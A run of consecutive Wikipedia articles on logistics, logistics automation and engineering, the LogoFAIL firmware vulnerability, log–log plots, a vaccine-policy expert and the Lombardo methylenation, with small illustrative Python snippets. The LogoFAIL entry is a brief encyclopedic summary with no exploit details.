At the warehouse level, the logistician must decide how to distribute merchandise over the racks. Three basic situations are traditionally considered: shared storage, dedicated storage (rack space reserved for specific merchandise) and class-based storage (class meaning merchandise organized in different areas according to their access index).
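A toy sketch of class-based storage: SKUs are ranked by a hypothetical access index and split into A/B/C classes; the 20%/50% thresholds and the SKU data are illustrative choices, not a standard.

```python
def classify_by_access_index(skus: dict[str, float]) -> dict[str, str]:
    """Assign each SKU to class A, B, or C by its access index (e.g. picks
    per period), so fast movers can be stored nearest the shipping area."""
    ranked = sorted(skus, key=skus.get, reverse=True)
    n, classes = len(ranked), {}
    for rank, sku in enumerate(ranked):
        if rank < 0.2 * n:
            classes[sku] = "A"  # fastest movers: closest storage area
        elif rank < 0.5 * n:
            classes[sku] = "B"
        else:
            classes[sku] = "C"  # slow movers: farthest storage area
    return classes

print(classify_by_access_index(
    {"bolts": 40.0, "gaskets": 12.0, "valves": 3.5, "seals": 0.8, "flanges": 0.2}))
```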
Picking efficiency varies greatly depending on the situation. [ 28 ] For a man-to-goods situation, a distinction is made between high-level picking (vertical component significant) and low-level picking (vertical component insignificant). A number of tactical decisions regarding picking must be made:
At the level of the distribution network, tactical decisions involve mainly inventory control and delivery path optimization. Note that the logistician may be required to manage the reverse flow along with the forward flow.
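Delivery path optimization is a large topic in its own right; as a small illustration, the greedy nearest-neighbor heuristic below builds a plausible (though generally not optimal) route from a depot through a set of stops with invented coordinates.

```python
import math

def nearest_neighbor_route(depot, stops):
    """Greedy heuristic for a delivery path: repeatedly drive to the closest
    unvisited stop, then return to the depot. Fast, but not optimal."""
    route, current, remaining = [depot], depot, list(stops)
    while remaining:
        nxt = min(remaining, key=lambda p: math.dist(current, p))
        remaining.remove(nxt)
        route.append(nxt)
        current = nxt
    route.append(depot)  # close the tour back at the depot
    return route

print(nearest_neighbor_route((0, 0), [(2, 3), (5, 1), (1, 7)]))
```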
Warehouse management systems (WMS) can differ significantly from warehouse control systems (WCS), although there is some overlap in functionality. A WMS plans a weekly activity forecast based on such factors as statistics and trends , whereas a WCS acts like a floor supervisor, working in real time to get the job done by the most effective means. For example, a WMS can tell the system hours in advance that it is going to need five units of stock-keeping unit (SKU) A and five units of SKU B, but by the time it acts, other considerations may have come into play or there could be a logjam on a conveyor. A WCS can prevent that problem by working in real time and adapting to the situation, making a last-minute decision based on current activity and operational status. Working synergistically , WMS and WCS can resolve these issues and maximize efficiency for companies that rely on the effective operation of their warehouse or distribution center. [ 30 ]
Logistics outsourcing involves a relationship between a company and an LSP (logistic service provider), which, compared with basic logistics services, has more customized offerings, encompasses a broad number of service activities, is characterized by a long-term orientation, and thus has a strategic nature. [ 31 ]
Outsourcing does not have to be complete externalization to an LSP, but can also be partial:
Third-party logistics (3PL) involves using external organizations to execute logistics activities that have traditionally been performed within an organization itself. [ 32 ] According to this definition, third-party logistics includes any form of outsourcing of logistics activities previously performed in house. For example, if a company with its own warehousing facilities decides to employ external transportation, this would be an example of third-party logistics. Logistics is an emerging business area in many countries. External 3PL providers have evolved from merely providing logistics capabilities to becoming real orchestrators of supply chains that create and sustain a competitive advantage, thus bringing about new levels of logistics outsourcing. [ 33 ]
The concept of a fourth-party logistics (4PL) provider was first defined by Andersen Consulting (now Accenture ) as an integrator that assembles the resources, planning capabilities, and technology of its own organization and other organizations to design, build, and run comprehensive supply chain solutions. Whereas a third-party logistics (3PL) service provider targets a single function, a 4PL targets management of the entire process. Some have described a 4PL as a general contractor that manages other 3PLs, truckers, forwarders, custom house agents, and others, essentially taking responsibility for a complete process for the customer.
Horizontal business alliances often occur between logistics service providers, i.e., the cooperation between two or more logistics companies that are potentially competing. [ 34 ] In a horizontal alliance, these partners can benefit twofold. On one hand, they can "access tangible resources which are directly exploitable": extending common transportation networks, sharing warehouse infrastructure, and offering more complex service packages can all be achieved by combining resources. On the other hand, partners can "access intangible resources, which are not directly exploitable". This typically includes know-how and information and, in turn, innovation. [ 34 ]
Logistics automation is the application of computer software or automated machinery to improve the efficiency of logistics operations. This typically refers to operations within a warehouse or distribution center with broader tasks undertaken by supply chain engineering systems and enterprise resource planning systems.
Industrial machinery can typically identify products through either barcode or RFID technologies. Information in traditional bar codes is stored as a sequence of black and white bars varying in width, which when read by laser is translated into a digital sequence, which according to fixed rules can be converted into a decimal number or other data. Sometimes information in a bar code can be transmitted through radio frequency; more typically, radio transmission is used in RFID tags. An RFID tag is a card containing a memory chip and an antenna that transmits signals to a reader. RFID may be found on merchandise, animals, vehicles, and people as well.
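As an illustration of how a barcode's digit sequence carries self-checking structure, the sketch below validates the check digit of an EAN-13 number; the sample value is chosen so the check passes.

```python
def ean13_is_valid(code: str) -> bool:
    """Validate an EAN-13 number: digits in odd positions (1st, 3rd, ...)
    weigh 1 and digits in even positions weigh 3; the weighted sum of all
    13 digits, check digit included, must be divisible by 10."""
    if len(code) != 13 or not code.isdigit():
        return False
    total = sum(int(d) * (3 if i % 2 else 1) for i, d in enumerate(code))
    return total % 10 == 0

print(ean13_is_valid("4006381333931"))  # True
print(ean13_is_valid("4006381333932"))  # False, corrupted check digit
```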
A logistician is a professional logistics practitioner. Professional logisticians are often certified by professional associations. One can either work in a pure logistics company, such as a shipping line, airport, or freight forwarder , or within the logistics department of a company. However, as mentioned above, logistics is a broad field, encompassing procurement, production, distribution, and disposal activities. Hence, career perspectives are broad as well.
A new trend [ as of? ] in the industry is the 4PL, or fourth-party logistics, firms, consulting companies offering logistics services.
Some universities and academic institutions train students as logisticians, offering undergraduate and postgraduate programs. A university with a primary focus on logistics is Kühne Logistics University in Hamburg, Germany. It is non-profit and supported by Kühne-Foundation of the logistics entrepreneur Klaus Michael Kühne .
The Chartered Institute of Logistics and Transport (CILT), established in the United Kingdom in 1919, received a Royal Charter in 1926. The Chartered Institute is one of the professional bodies or institutions for the logistics and transport sectors that offer professional qualifications or degrees in logistics management. CILT programs can be studied at centers around the UK, some of which also offer distance learning options. [ 35 ] The institute also has overseas branches, namely the Chartered Institute of Logistics & Transport Australia (CILTA) [ 36 ] in Australia and the Chartered Institute of Logistics and Transport in Hong Kong (CILTHK) [ 37 ] in Hong Kong. In the UK, logistics management programs are conducted by many universities and professional bodies such as CILT. These programs are generally offered at the postgraduate level.
The Global Institute of Logistics [ 38 ] established in New York in 2003 is a think tank for the profession and is primarily concerned with intercontinental maritime logistics. It is particularly concerned with container logistics and the role of the seaport authority in the maritime logistics chain.
The International Association of Public Health Logisticians (IAPHL) [ 39 ] is a professional network that promotes the professional development of supply chain managers and others working in the field of public health logistics and commodity security, with particular focus on developing countries. The association supports logisticians worldwide by providing a community of practice, where members can network, exchange ideas, and improve their professional skills.
There are many museums in the world which cover various aspects of practical logistics. These include museums of transportation, customs, packing, and industry-based logistics. However, only the following museums are fully dedicated to logistics:
General logistics
Military logistics | https://en.wikipedia.org/wiki/Logistics |
Logistics automation is the application of computer software or automated machinery to logistics operations in order to improve their efficiency. Typically this refers to operations within a warehouse or distribution center , with broader tasks undertaken by supply chain engineering systems and enterprise resource planning systems.
Logistics automation systems can powerfully complement the facilities provided by these higher level computer systems . The focus on an individual node within a wider logistics network allows systems to be highly tailored to the requirements of that node.
Logistics automation systems comprise a variety of hardware and software components:
A typical warehouse or distribution center will receive stock of a variety of products from suppliers and store these until the receipt of orders from customers, whether individual buyers (e.g. mail order), retail branches (e.g. chain stores ), or other companies (e.g. wholesalers ). A logistics automation system may provide the following:
A complete warehouse automation system can drastically reduce the workforce required to run a facility, with human input required only for a few tasks, such as picking units of product from a bulk packed case. [ 1 ] Even here, assistance can be provided with equipment such as pick-to-light units. Smaller systems may only be required to handle part of the process. Examples include automated storage and retrieval systems, which simply use cranes to store and retrieve identified cases or pallets , typically into a high-bay storage system which would be unfeasible to access using fork-lift trucks or any other means. The use of automatic guided vehicles (AGVs) maximizes output compared to human workers, since AGVs can perform repetitive tasks for long hours with little to no supervision. An AGV is built and programmed for precision and accuracy, thereby reducing the chance of errors in a warehouse, especially when dealing with fragile goods. [ 2 ]
Software or cloud -based SaaS solutions are used for logistics automation which helps the supply chain industry in automating the workflow as well as management of the system. [ 3 ] Knowledge @ Wharton staff writers noted in 2011 that some manufacturers and retailers were weathering the Great Recession "by signing up for pay-as-you-go logistics services available through the Internet 'cloud'". They identified the benefits and reduced costs which came from sharing information about shipments with suppliers, hauliers and end users. [ 4 ]
There is little generalized software available in this market, because systems and workflows differ from company to company even though the underlying practice is broadly similar. Most commercial companies therefore use custom solutions.
However, various software solutions are used within the departments of logistics, of which there are several, namely: Conventional Department, Container Department, Warehouse, Marine Engineering, Heavy Haulage, etc. | https://en.wikipedia.org/wiki/Logistics_automation |
Logistics engineering is a field of engineering dedicated to the scientific organization of the purchase , transport , storage, distribution , and warehousing of materials and finished goods. Logistics engineering is a complex science that considers trade-offs in component/system design, repair capability, training, spares inventory , demand history, storage and distribution points, transportation methods, etc., to ensure the "thing" is where it's needed, when it's needed, and operating the way it's needed all at an acceptable cost.
Logistics is generally concerned with cost-centre service activities, but it provides value via improved efficiency and customer satisfaction. It can quickly lose that value if the customer becomes dissatisfied. The end customer can include another process or work center inside the manufacturing facility, a warehouse where items are stocked, or the final customer who will use the product. Another approach that has appeared in recent years is supply chain management . The supply chain also looks at an efficient chaining of the supply/purchase and distribution sides of an organization . While logistics looks at single echelons with only the immediate supply and distribution linked up, the supply chain looks at multiple echelons/stages, from procurement of raw materials to the final distribution of finished goods to the customer. It is based on the basic premise that supply and distribution activities, if integrated with manufacturing/logistics activities, can result in better profitability for the organization. The local minimum of the total cost of the manufacturing operation is replaced by the global minimum of the total cost of the whole chain, resulting in better profitability for the chain members and hence lower costs for the products.
Logistics engineering as a discipline is a very important aspect of systems engineering that also includes reliability engineering . It is the science and process whereby reliability , maintainability , and availability are designed into products or systems. It includes the supply and physical distribution considerations above as well as more fundamental engineering considerations. Logistics engineers work with complex mathematical models that consider elements such as mean time between failures (MTBF), mean time to failure (MTTF), mean time to repair (MTTR), failure mode and effects analysis (FMEA), statistical distributions , queueing theory , and a host of other considerations. For example, if we want to produce a system that is 95% reliable (or improve a system to achieve 95% reliability), a logistics engineer understands that total system reliability can be no greater than that of the least reliable subsystem or component. Therefore, the logistics engineer must consider the reliability of all subcomponents or subsystems and modify the system design accordingly. If a subsystem is only 50% reliable, one can concentrate on improving the reliability of that subsystem, design in multiple subsystems in parallel (five in this case would achieve approximately 97% reliability of that subsystem), purchase and store spare subsystems for rapid changeout, establish repair capability that would get a failed subsystem back in operation in the required amount of time, or choose any combination of those approaches to achieve the optimal cost vs. reliability solution. Then the engineer moves on to the next subsystem.
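The series and parallel reliability rules used in that reasoning are easy to state in code. A minimal sketch (the part reliabilities are hypothetical):

```python
def series_reliability(parts):
    """A series system works only if every part works: multiply reliabilities."""
    r = 1.0
    for p in parts:
        r *= p
    return r

def parallel_reliability(r_part: float, n: int) -> float:
    """n redundant copies in parallel: the system fails only if all n fail."""
    return 1.0 - (1.0 - r_part) ** n

print(f"{parallel_reliability(0.50, 5):.4f}")  # 0.9688, five 50% subsystems in parallel
print(f"{series_reliability([0.99, 0.97, 0.9688]):.4f}")  # the resulting series system
```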
There are few differences between the terms business logistics and logistics engineering. Logistics engineering is more focused on the mathematical or scientific application of logistics. [ 1 ]
The various fields and topics that logistics engineers are involved with include:
Different performance metrics (measures of performance) are used to examine the efficiency of an organization's logistics. The most popular and widely used performance metric is the landed cost. The landed cost is the total cost of purchasing, transporting, warehousing and distributing raw materials, semi-finished and finished goods.
Another equally important performance metric is the end customer fill rate : the percentage of customer demand that is satisfied immediately off-the-shelf (from on-site inventory). An alternative to fill rate is system availability .
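A minimal sketch of the fill-rate calculation, with hypothetical demand figures:

```python
def fill_rate(units_demanded: int, units_shipped_from_stock: int) -> float:
    """End-customer fill rate: the fraction of demand satisfied immediately
    from on-site inventory, without backorders."""
    return units_shipped_from_stock / units_demanded if units_demanded else 1.0

print(f"{fill_rate(1_000, 940):.1%}")  # 94.0%
```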
In recent years, the United States Department of Defense (DoD) has advocated the use of performance-based logistics (PBL) contracts to manage costs for support of weapon systems .
Many top universities offer Logistics engineering programs at undergraduate and graduate levels. These programs generally combine strategy, operations, facility design, technology and management. The following institutions provide Logistics engineering programs around the world: | https://en.wikipedia.org/wiki/Logistics_engineering |
LogoFAIL is a security vulnerability and exploit thereof that affects computer motherboard firmware with TianoCore EDK II , including Insyde Software 's InsydeH2O modules and similar code in AMI and Phoenix firmware, which are commonly found on both Intel and AMD motherboards, and which enable loading of custom boot logos. The exploit was discovered in December 2023 by researchers at Binarly . [ 1 ] [ 2 ]
The vulnerability exists when the Driver Execution Environment (DXE) is active after a successful Power On Self Test (POST) in the UEFI firmware (also known as the BIOS). The UEFI's boot logo is replaced with the exploit payload at this point, and the exploit can then take control of the system. [ 2 ]
Intel patched the issue in Intel Management Engine (ME) version 16.1.30.2307 in December 2023. AMD addressed the problem in AGESA version 1.2.0.b, although some motherboard manufacturers did not include the fix under AGESA 1.2.0.c. [ 3 ]
| https://en.wikipedia.org/wiki/LogoFAIL |
In science and engineering , a log–log graph or log–log plot is a two-dimensional graph of numerical data that uses logarithmic scales on both the horizontal and vertical axes. Power functions – relationships of the form $y = ax^{k}$ – appear as straight lines in a log–log graph, with the exponent corresponding to the slope and the coefficient corresponding to the intercept. Thus these graphs are very useful for recognizing these relationships and estimating parameters . Any base can be used for the logarithm, though base 10 (common logs) is most frequently used.
Given a monomial equation $y = ax^{k}$, taking the logarithm of the equation (with any base) yields: $\log y = k \log x + \log a$.
Setting $X = \log x$ and $Y = \log y$, which corresponds to using a log–log graph, yields the equation $Y = mX + b$,
where $m = k$ is the slope of the line ( gradient ) and $b = \log a$ is the intercept on the $(\log y)$-axis, meaning where $\log x = 0$; so, reversing the logs, $a$ is the $y$ value corresponding to $x = 1$. [ 1 ]
The equation for a line on a log–log scale would be: $\log_{10} F(x) = m \log_{10} x + b$, that is, $F(x) = x^{m} \cdot 10^{b}$, where $m$ is the slope and $b$ is the intercept point on the log plot.
To find the slope of the plot, two points are selected on the $x$-axis, say $x_1$ and $x_2$. Using the equations $\log[F(x_1)] = m \log(x_1) + b$ and $\log[F(x_2)] = m \log(x_2) + b$, the slope $m$ is found by taking the difference: $$m = \frac{\log(F_{2}) - \log(F_{1})}{\log(x_{2}) - \log(x_{1})} = \frac{\log(F_{2}/F_{1})}{\log(x_{2}/x_{1})},$$ where $F_1$ is shorthand for $F(x_1)$ and $F_2$ is shorthand for $F(x_2)$. The figure at right illustrates the formula. Notice that the slope in the example of the figure is negative . The formula also provides a negative slope, as can be seen from the following property of the logarithm: $\log(x_1/x_2) = -\log(x_2/x_1)$.
The above procedure now is reversed to find the form of the function $F(x)$ using its (assumed) known log–log plot. To find the function $F$, pick some fixed point $(x_0, F_0)$, where $F_0$ is shorthand for $F(x_0)$, somewhere on the straight line in the above graph, and further some other arbitrary point $(x_1, F_1)$ on the same graph. Then from the slope formula above: $$m = \frac{\log(F_{1}/F_{0})}{\log(x_{1}/x_{0})},$$ which leads to $\log(F_1/F_0) = m \log(x_1/x_0) = \log[(x_1/x_0)^{m}]$. Noticing that $10^{\log_{10} F_1} = F_1$, the logs can be inverted to find: $$\frac{F_{1}}{F_{0}} = \left(\frac{x_{1}}{x_{0}}\right)^{m} \quad \text{or} \quad F_{1} = \frac{F_{0}}{x_{0}^{m}}\, x_{1}^{m},$$ which means that $F(x) = \mathrm{constant} \cdot x^{m}$. In other words, $F$ is proportional to $x$ to the power of the slope of the straight line of its log–log graph. Specifically, a straight line on a log–log plot containing points $(x_0, F_0)$ and $(x_1, F_1)$ will have the function: $$F(x) = F_{0} \left(\frac{x}{x_{0}}\right)^{\frac{\log(F_{1}/F_{0})}{\log(x_{1}/x_{0})}}.$$ Of course, the inverse is true too: any function of the form $F(x) = \mathrm{constant} \cdot x^{m}$ will have a straight line as its log–log graph representation, where the slope of the line is $m$.
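A small sketch of this recovery procedure in code, using two points that lie on the hypothetical power law F(x) = 3x²:

```python
import math

def power_law_from_points(x0, f0, x1, f1):
    """Recover F(x) = c * x**m from two points on a straight log-log line."""
    m = math.log(f1 / f0) / math.log(x1 / x0)  # slope on log-log axes
    c = f0 / x0 ** m                           # coefficient from either point
    return m, c

m, c = power_law_from_points(2.0, 12.0, 8.0, 192.0)
print(m, c)  # 2.0 3.0, i.e. F(x) = 3 * x**2
```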
To calculate the area under a continuous, straight-line segment of a log–log plot (or to estimate the area under an almost-straight line), take the function defined previously, $F(x) = \mathrm{constant} \cdot x^{m}$, and integrate it. Since the integral is definite (two defined endpoints), the area $A$ under the plot takes the form $$A = \int_{x_{0}}^{x_{1}} F(x)\,dx = \left.\frac{\mathrm{constant}}{m+1} \cdot x^{m+1}\right|_{x_{0}}^{x_{1}}.$$
Rearranging the original equation and plugging in the fixed point values, it is found that $$\mathrm{constant} = \frac{F_{0}}{x_{0}^{m}}.$$
Substituting back into the integral, one finds that for $A$ over $x_0$ to $x_1$:
$$\begin{aligned} A &= \frac{F_{0}/x_{0}^{m}}{m+1} \cdot \left(x_{1}^{m+1} - x_{0}^{m+1}\right)\\[1.2ex] \log A &= \log\left[\frac{F_{0}/x_{0}^{m}}{m+1} \cdot \left(x_{1}^{m+1} - x_{0}^{m+1}\right)\right]\\ &= \log\frac{F_{0}}{m+1} + \log\frac{1}{x_{0}^{m}} + \log\left(x_{1}^{m+1} - x_{0}^{m+1}\right)\\ &= \log\frac{F_{0}}{m+1} + \log\left(\frac{x_{1}^{m+1} - x_{0}^{m+1}}{x_{0}^{m}}\right)\\ &= \log\frac{F_{0}}{m+1} + \log\left(\frac{x_{1}^{m}}{x_{0}^{m}} \cdot x_{1} - x_{0}\right) \end{aligned}$$
Therefore, $$A = \frac{F_{0}}{m+1} \cdot \left[x_{1} \cdot \left(\frac{x_{1}}{x_{0}}\right)^{m} - x_{0}\right].$$
For $m = -1$, the integral becomes $$A_{(m=-1)} = \int_{x_{0}}^{x_{1}} F(x)\,dx = \int_{x_{0}}^{x_{1}} \frac{\mathrm{constant}}{x}\,dx = F_{0} \cdot x_{0} \int_{x_{0}}^{x_{1}} \frac{dx}{x} = F_{0} \cdot x_{0} \cdot \ln\frac{x_{1}}{x_{0}}.$$
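A quick numerical check of the closed-form area against a trapezoid-rule approximation; the curve parameters are arbitrary illustrative values.

```python
import numpy as np

def loglog_segment_area(f0: float, x0: float, x1: float, m: float) -> float:
    """Closed-form area under F(x) = (f0 / x0**m) * x**m between x0 and x1."""
    if m == -1:
        return f0 * x0 * np.log(x1 / x0)
    return f0 / (m + 1) * (x1 * (x1 / x0) ** m - x0)

x = np.linspace(1.0, 4.0, 100_001)
f = 2.0 * x ** 1.5                                  # F0 = 2 at x0 = 1, m = 1.5
approx = ((f[:-1] + f[1:]) / 2 * np.diff(x)).sum()  # trapezoid rule
print(loglog_segment_area(2.0, 1.0, 4.0, 1.5), approx)  # both about 24.8
```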
Log–log plots are often used for visualizing log–log linear regression models with (roughly) log-normal , or log-logistic , errors. In such models, after log-transforming the dependent and independent variables, a simple linear regression model can be fitted, with the errors becoming homoscedastic . This model is useful when dealing with data that exhibits exponential growth or decay, while the errors continue to grow as the independent value grows (i.e., heteroscedastic error).
As above, in a log–log linear model the relationship between the variables is expressed as a power law: every percentage change in the independent variable results in a constant percentage change in the dependent variable. The model is expressed as: $y = a x^{b} e^{\epsilon}$.
Taking the logarithm of both sides, we get: $\log(y) = \log(a) + b \log(x) + \epsilon$.
This is a linear equation in the logarithms of $x$ and $y$, with $\log(a)$ as the intercept and $b$ as the slope, in which $\epsilon \sim \mathrm{Normal}(\mu, \sigma^{2})$ and $e^{\epsilon} \sim \mathrm{Log\text{-}Normal}(\mu, \sigma^{2})$.
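A minimal sketch of fitting this model: simulate y = a·x^b·e^ε with log-normal noise, then run ordinary least squares on the logged variables. The "true" parameters a = 3 and b = 0.7 are arbitrary.

```python
import numpy as np

rng = np.random.default_rng(0)
a_true, b_true = 3.0, 0.7
x = rng.uniform(1.0, 100.0, size=500)
y = a_true * x ** b_true * np.exp(rng.normal(0.0, 0.3, size=500))

# OLS on the logged variables: log y = log a + b log x + eps
b_hat, log_a_hat = np.polyfit(np.log(x), np.log(y), 1)
print(f"b is about {b_hat:.2f}, a is about {np.exp(log_a_hat):.2f}")
```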
Figure 1 illustrates how this looks. It presents two plots generated using 10,000 simulated points. The left plot, titled 'Concave Line with Log-Normal Noise', displays a scatter plot of the observed data (y) against the independent variable (x). The red line represents the 'Median line', while the blue line is the 'Mean line'. This plot illustrates a dataset with a power-law relationship between the variables, represented by a concave line.
When both variables are log-transformed, as shown in the right plot of Figure 1, titled 'Log-Log Linear Line with Normal Noise', the relationship becomes linear. This plot also displays a scatter plot of the observed data against the independent variable, but with both axes on a logarithmic scale. Here, the mean and median lines coincide (the red line). This transformation allows us to fit a simple linear regression model (which can then be transformed back to the original scale, as the median line).
The transformation from the left plot to the right plot in Figure 1 also demonstrates the effect of the log transformation on the distribution of noise in the data. In the left plot, the noise appears to follow a log-normal distribution , which is right-skewed and can be difficult to work with. In the right plot, after the log transformation, the noise appears to follow a normal distribution , which is easier to reason about and model.
This normalization of noise is further analyzed in Figure 2, which presents a line plot of three error metrics ( Mean Absolute Error - MAE, Root Mean Square Error - RMSE, and Mean Absolute Logarithmic Error - MALE) calculated over a sliding window of size 28 on the x-axis. The y-axis gives the error, plotted against the independent variable (x). Each error metric is represented by a different color, with the corresponding smoothed line overlaying the original line (since this is just simulated data, the error estimation is a bit jumpy). These error metrics provide a measure of the noise as it varies across different x values.
Log-log linear models are widely used in various fields, including economics, biology, and physics, where many phenomena exhibit power-law behavior. They are also useful in regression analysis when dealing with heteroscedastic data, as the log transformation can help to stabilize the variance.
These graphs are useful when the parameters a and b need to be estimated from numerical data. Specifications such as this are used frequently in economics .
One example is the estimation of money demand functions based on inventory theory , in which it can be assumed that money demand at time $t$ is given by $$M_{t} = A R_{t}^{b} Y_{t}^{c} U_{t},$$ where $M$ is the real quantity of money held by the public, $R$ is the rate of return on an alternative, higher yielding asset in excess of that on money, $Y$ is the public's real income , $U$ is an error term assumed to be lognormally distributed , $A$ is a scale parameter to be estimated, and $b$ and $c$ are elasticity parameters to be estimated. Taking logs yields $$m_{t} = a + b r_{t} + c y_{t} + u_{t},$$ where $m = \log M$, $a = \log A$, $r = \log R$, $y = \log Y$, and $u = \log U$, with $u$ being normally distributed . This equation can be estimated using ordinary least squares .
Another economic example is the estimation of a firm's Cobb–Douglas production function , which is the right side of the equation $$Q_{t} = A N_{t}^{\alpha} K_{t}^{\beta} U_{t},$$ in which $Q$ is the quantity of output that can be produced per month, $N$ is the number of hours of labor employed in production per month, $K$ is the number of hours of physical capital utilized per month, $U$ is an error term assumed to be lognormally distributed, and $A$, $\alpha$, and $\beta$ are parameters to be estimated. Taking logs gives the linear regression equation $$q_{t} = a + \alpha n_{t} + \beta k_{t} + u_{t},$$ where $q = \log Q$, $a = \log A$, $n = \log N$, $k = \log K$, and $u = \log U$.
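A sketch of how such an estimation might be run on simulated data; the production-function parameters below are arbitrary illustrative values, not empirical estimates.

```python
import numpy as np

rng = np.random.default_rng(1)
n_obs = 200
N = rng.uniform(100.0, 1000.0, n_obs)   # labor hours per month (simulated)
K = rng.uniform(50.0, 500.0, n_obs)     # capital hours per month (simulated)
Q = 2.0 * N ** 0.6 * K ** 0.3 * np.exp(rng.normal(0.0, 0.1, n_obs))

# Regress q on n and k with an intercept: q = a + alpha*n + beta*k + u
X = np.column_stack([np.ones(n_obs), np.log(N), np.log(K)])
coef, *_ = np.linalg.lstsq(X, np.log(Q), rcond=None)
print(f"A ~ {np.exp(coef[0]):.2f}, alpha ~ {coef[1]:.2f}, beta ~ {coef[2]:.2f}")
```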
Log–log regression can also be used to estimate the fractal dimension of a naturally occurring fractal .
However, going in the other direction – observing that data appears as an approximate line on a log–log scale and concluding that the data follows a power law – is not always valid. [ 2 ]
In fact, many other functional forms appear approximately linear on the log–log scale, and simply evaluating the goodness of fit of a linear regression on logged data using the coefficient of determination ( R 2 ) may be invalid, as the assumptions of the linear regression model, such as Gaussian error, may not be satisfied; in addition, tests of fit of the log–log form may exhibit low statistical power , as these tests may have low likelihood of rejecting power laws in the presence of other true functional forms. While simple log–log plots may be instructive in detecting possible power laws, and have been used dating back to Pareto in the 1890s, validation of a power law requires more sophisticated statistics. [ 2 ]
These graphs are also extremely useful when data are gathered by varying the control variable along an exponential function, in which case the control variable x is more naturally represented on a log scale, so that the data points are evenly spaced, rather than compressed at the low end. The output variable y can either be represented linearly, yielding a lin–log graph (log x , y ), or its logarithm can also be taken, yielding the log–log graph (log x , log y ).
A Bode plot (a graph of the frequency response of a system) is also a log–log plot.
In chemical kinetics , the general form of the dependence of the reaction rate on concentration takes the form of a power law ( law of mass action ), so a log–log plot is useful for estimating the reaction parameters from experiment. | https://en.wikipedia.org/wiki/Log–log_plot |
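For example, given rate measurements that follow a hypothetical second-order law rate = k[A]², the slope of a log–log fit recovers the reaction order and the intercept recovers the rate constant:

```python
import numpy as np

conc = np.array([0.10, 0.20, 0.40, 0.80])          # [A] in mol/L (made-up data)
rate = np.array([0.0025, 0.0100, 0.0400, 0.1600])  # generated from rate = 0.25*[A]**2

order, log_k = np.polyfit(np.log(conc), np.log(rate), 1)
print(f"reaction order n of about {order:.2f}, rate constant k of about {np.exp(log_k):.3f}")
```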
Lois Privor-Dumm is an American public policy expert in the field of vaccine introduction.
Her work on new vaccine introduction has included strategies to accelerate access in low- and middle-income countries, policy research, advocacy, communications, and large-country introduction. She currently serves as the Director of Alliances & Information at the International Vaccine Access Center (IVAC) at the Johns Hopkins Bloomberg School of Public Health . Her team conducts advocacy and communications for child health, coordinates the World Pneumonia Day Coalition, and works with large countries such as India and Nigeria to provide technical assistance in the form of advocacy and communications, evidence synthesis, stakeholder mapping, and research to help countries develop strategies to address the barriers to decision making and implementation for new vaccines. [ citation needed ]
Her team has worked closely with a variety of stakeholders in India and Nigeria and is focused on building both high-level political and grassroots support. She is currently leading projects in India and Nigeria made possible through grants from the GAVI Alliance and Bill & Melinda Gates Foundation . [ citation needed ]
She is a member of the GAVI Large Country Task Team and the PDP Access Steering Committee and has worked on a number of access related projects dealing with economics and financing, supply, distribution and demand forecasting in addition to her work with advocacy, communications and policy. [ 1 ] [ 2 ] [ 3 ]
Ms. Privor-Dumm holds an International MBA (IMBA), formerly Masters in International Business (MIBS), from the University of South Carolina and completed her studies and internship in Brussels, Belgium. She completed her undergraduate studies at the University at Albany in Business Administration (Finance) and Spanish. [ citation needed ]
In 2005, she joined The Johns Hopkins Bloomberg School of Public Health to lead Communications & Strategy for the Hib Initiative, a GAVI-funded project with an aim to accelerate and sustain decisions regarding Hib vaccines to help prevent meningitis and pneumonia in children. Now serving as Director of Alliances and Information for IVAC, she has been cited as an expert for different global vaccine campaigns and been involved in research and promotion of vaccine awareness. She has been interviewed by Developments Magazine [ 4 ] and African Press International [ 5 ] about the availability of pneumonia related vaccines in African countries.
She worked on different communication tools regarding the availability of vaccines in developing countries [ 6 ] to raise awareness about the value of pneumococcal and Hib vaccinations to prevent pneumonia and reach Millennium Development Goal 4 by 2015. [ 7 ]
The mission of the Accelerated Vaccine Introduction Initiative (AVI) is to save lives, prevent disease, and promote health through timely and equitable access to new and underused vaccines. Together, AVI partners serve to:
The Accelerated Vaccine Initiative Technical Advisory Consortium (AVI TAC) supports the achievement of AVI objectives through its leadership in creating the evidence base, advocating for evidence-driven decision-making, and building platform capacity that can be used to accelerate the introduction of future vaccines. [ citation needed ] | https://en.wikipedia.org/wiki/Lois_Privor-Dumm |
In organic chemistry , the Lombardo methylenation is a name reaction that allows for the methylenation of carbonyl compounds with the use of Lombardo's reagent, which is a mix of zinc , dibromomethane , and titanium tetrachloride . [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ]
The Lombardo methylenation has been used in the total syntheses of tetrodotoxin [ 8 ] and hirsutene. [ 9 ] [ 10 ]
| https://en.wikipedia.org/wiki/Lombardo_methylenation |